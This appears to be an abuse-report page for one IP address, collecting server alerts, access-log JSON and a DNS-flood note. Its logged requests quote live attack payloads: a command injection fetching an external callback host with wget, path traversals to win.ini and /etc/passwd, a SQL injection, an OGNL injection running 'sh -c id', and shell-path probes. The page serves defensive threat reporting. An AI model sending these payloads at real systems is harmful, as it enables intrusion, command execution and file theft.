(cxs) cxs mod_security triggered by 185.236.79.18 (NL/Netherlands/185.236.79.18.deltahost-ptr): N in ...
show more(cxs) cxs mod_security triggered by 185.236.79.18 (NL/Netherlands/185.236.79.18.deltahost-ptr): N in the last X secs
show less
659 attacks on wget probes, directory traversals, password grabbing URLs, too many concurrent reques ...
show more659 attacks on wget probes, directory traversals, password grabbing URLs, too many concurrent requests, deployment descriptor URLs, SQL Injections (type 1), shell probes, PHP URLs, Confluence URLs:
GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d7tm9952vjnlq6ijjamgzmexityathkys.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
POST /OA_HTML/lcmServiceController.jsp HTTP/1.1
GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
POST /php/demo.php HTTP/1.1
GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23
show less
{"level":"info","ts":1778092766.8297577,"logger":"http.log.access.log1","msg":"handled request","req ...
show more{"level":"info","ts":1778092766.8297577,"logger":"http.log.access.log1","msg":"handled request","request":{"remote_ip":"185.236.79.18","remote_port":"46674","client_ip":"185.236.79.18","proto":"HTTP/1.1","method":"POST","host":"status.adur-worthing.gov.uk","uri":"/wp-content/plugins/wsecure/wsecure-config.php","headers":{"User-Agent":["Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"],"Connection":["close"],"Content-Length":["100"],"Accept":["*/*"],"Accept-Language":["en"],"Accept-Encoding":["gzip"]},"tls":{"resumed":false,"version":772,"cipher_suite":4867,"proto":"","server_name":"status.adur-worthing.gov.uk"}},"bytes_read":0,"user_id":"","duration":0.000080664,"size":0,"status":429,"resp_headers":{"Server":["Caddy"],"Alt-Svc":["h3=\":443\"; ma=2592000"],"Retry-After":["1"]}}
{"level":"info","ts":1778092766.8311217,"logger":"http.log.access.log1","msg":"handled request","request":{"remote_ip":"185.236.79.18","remote_
...
show less
High-frequency DNS probing for non-existent/bogus subdomains (NXDOMAIN Flood). IP is targeting rando ...
show moreHigh-frequency DNS probing for non-existent/bogus subdomains (NXDOMAIN Flood). IP is targeting random prefixes in an apparent DNS reconnaissance or DDoS attempt. Seen in Cloudflare Security Analytics.
show less